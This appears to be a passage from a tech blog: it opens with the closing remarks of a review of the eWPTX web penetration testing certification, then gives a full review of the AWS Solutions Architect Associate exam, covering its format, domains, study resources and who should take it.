    I have always been a fan of the eLearn Security certifications - for the most part, they’re flexible, realistic and fair. The eWPTX wasn’t terrible, but it wasn’t quite up to the usual standard, and in addition, it was inconsistent and somewhat unstable. One major caveat to keep in mind is that I did not take the official training, and I wouldn’t be surprised if the official course had example payloads or a different approach to exploitation which may have worked better on the actual exam - nonetheless, a working exploit should always be a working exploit.

    If you have an INE subscription I’d say the eWPTX is a good goal to aim for - similarly, if you’re fairly confident with web exploits and have the fortitude to keep telling yourself “No, this should work!” you should be able to pass the exam. This being said, for those who have less experience, less confidence or just less patience, this might not be the best certification for you, at least in its current state.

    Conclusion

    The eWPTX is a good concept, but it’s crippled by technical issues and instability which make it borderline unfair. I wouldn’t be surprised to see INE update this certification in the near future, and I hope they do because there’s certainly a place for it in the market - right now it just needs a little love and a few updates.

  • Other

    Introduction

    After some years of working with AWS but not getting around to certifying, I recently decided to dive into AWS certification with what seems to be the most popular choice (At least for a first certification) - the AWS Certified Solutions Architect Associate. This is my quick review of the certification!

    Certification Overview

    The AWS Certified Solutions Architect – Associate certification is currently one of the most sought-after credentials for professionals who want to showcase their expertise in designing scalable and highly available AWS solutions, although I’m often sceptical of the validity of “Best Certification” lists, you see this one come up often enough to see that it’s certainly in demand. Per AWS, this certification “Showcases knowledge and skills in AWS technology, across a wide range of AWS services. The focus of this certification is on the design of cost and performance-optimized solutions, demonstrating a strong understanding of the AWS Well-Architected Framework” - I’d say that’s a fair description of what you’ll get out of studying for it!

    Overall the certification is essentially a sweep through the various services offered by AWS, with a focus on the Well-Architected Framework and cost optimisation. While this is definitely a step up from AWS Cloud Practitioner in terms of technical knowledge, you won’t need a deep understanding of IT infrastructure to pass this one. Knowledge at the CompTIA A+ / Net+ / Sec+ level should be enough if you’re after a rough benchmark.

    AWS states that “This exam does not require deep hands-on coding experience, although familiarity with basic programming concepts would be an advantage.” Truthfully, I’m not sure that any understanding of programming was really required here - familiarity with JSON and YAML is required for the exam but being able to read and understand the format was enough.

    Exam Details

    • Exam Title: AWS Certified Solutions Architect – Associate

    • Exam Code: SAA-C03

    • Exam Format: Multiple-choice and multiple-response questions

    • Duration: 130 minutes

    • Passing Score: Approximately 720 (on a scale of 100-1000)

    • Prerequisites: No formal prerequisites, but having some experience with AWS services is recommended

    • Exam Guide: AWS Certified Solutions Architect – Associate Exam Guide

    Exam Domains

    According to the specification, the AWS Solutions Architect Associate certification exam is divided into the following key domains:

    • Domain 1: Design Secure Architectures (30% of scored content)
    • Domain 2: Design Resilient Architectures (26% of scored content)
    • Domain 3: Design High-Performing Architectures (24% of scored content)
    • Domain 4: Design Cost-Optimized Architectures (20% of scored content)

    Overall I felt that this was an accurate representation of the actual question split on the exam, if anything cost optimisation featured a little more heavily than what felt like 20%.

    Study Resources

    Unlike many vendors (mentioning no names) AWS do provide a good variety of resources to help you study for the exam - on top of this there’s some excellent third party providers offering some affordable and enjoyable training. Some key items to check out include:

    • AWS Official Documentation: I find reading through lots of documentation a bit challenging, but AWS’s training materials do a good job of signposting the most relevant ones to focus on. AWS offers extensive documentation on each service, architecture best practices, and whitepapers - I’d focus on the core documentation for the exam.
    • AWS Skill Builder: AWS provides a variety of useful resources, reasonably priced at $29 USD + tax per month - I’d recommend this for at least a single month.
    • Free Official Practice Questions: AWS offer a free official practice exam (link below) - worth a look.
    • Official Practice Exam - Available as part of the skill builder subscription, I found this to be quite representative of the actual exam - better than most practice exams.
    • Online Courses: Outside of AWS official resources there are plenty of courses available from platforms like Udemy, or subscription platforms like ITProTV or CBT Nuggets. Not on either of these platforms but well worth your time are the courses from Adrian Cantrill.
    • Labs: One of the best things about practising for an AWS exam was that labbing was very easy to do - simply create an AWS account and try things out. You can test out 99% of the services on the exam for free as part of the free tier.

    You can find the complete list of official resources from Amazon here.

    Preparation Tips

    Being able to compare and contrast different AWS services is key for success here - therefore while you’ll want to get some hands-on time with the services (not least because this is the fun part), spending some time making lists and tables which allow you to memorise the key selling points for each service is also a valuable use of time. Many of the harder questions on the exam did require you to choose between two viable options within AWS, so understanding which products are cheaper, faster, more user friendly or come with better resiliency will help greatly here.

    As always, it’s a multiple-choice exam, so ensure that you’re doing plenty of practice with exam-style questions in the run-up to the test - being a wizard on the AWS platform won’t be enough to pass if you can’t work through the questions in the allotted time!

    Exam Experience

    Exam booking is through AWS’s Certmetrics platform and was straightforward, all exams are now delivered by Pearson Vue (PSI was previously an option but no longer) and can be taken online or at a test centre. I took mine online as is my preference. Nothing unusual or interesting to report in this regard, other than the fact that you are not shown your score or even a pass/fail after the exam itself. I had to wait just over 24 hours for an email confirming I’d passed.

    The exam itself was fairly straightforward - as with most (but not all) exams on the Pearson Vue platform you can go back and forward through the questions and bookmark any tough ones for review. There were no especially hard or “unfair” feeling questions - certainly a few tricky ones but nothing way out of left field. I finished the exam with plenty of time remaining and didn’t feel any more rushed than the usual exam stress leaves you feeling!

    Should I get this certification?

    Overall I found the certification to be enjoyable and accessible, and I think most people would have this experience. Personally, I found this a great way to formalise my knowledge of AWS and to explore services which I wouldn’t normally use. What would vary based on your background might be time to complete. I studied for about 3 months on and off and around work - I’m sure you could work through the material much more quickly if you were able to commit to studying full-time.

    If you have other cloud certifications this will be an exercise in learning how things are done on AWS, and if you’ve been using AWS for some time but don’t have a certification, it will be an exercise in exploring many of those services you’ve never looked at - neither of these would take especially long in my opinion, and if either of these describes you I think you’ll enjoy the certification.

    Those with a tech background but little to no experience in cloud computing may want to start with the Cloud Practitioner exam first - this is an easier introduction to the subject (and passing it will award you a 50% discount coupon for SAA, so you don’t lose out much financially). Failing that, getting familiar with the way that cloud “works” will take a bit of study and some lab time to get comfortable with some concepts, however, you’re unlikely to encounter anything especially mind-bending studying for the SAA, it’s more a case of translating your on-prem knowledge to a cloud model.

    If you’re just getting into the technology field, however, I’d strongly recommend the Cloud Practitioner exam first - this exam (and the free material available from AWS) is written very much for those just getting started - this would be the best place to start!

    It’s also worth mentioning that the three AWS Associate level exams (Architect, DevOps and SysOps) share a lot of common content, if you’re planning to take more than one, I’d recommend starting with the SAA - the high-level view it gives you is great framing for the other certs too.

    Conclusion

    Studying for and taking the AWS Certified Solutions Architect Associate certification was enjoyable and rewarding - the cert itself is a valuable and in-demand credential that demonstrates your skills in designing and implementing AWS architectures. Next up, I’ll look to take the AWS Security Specialism exam, which aligns more closely with my main interests and areas of work, but I’d agree with the many reviews and recommendations online that say SAA is an excellent starting point for getting your foot in the door with AWS.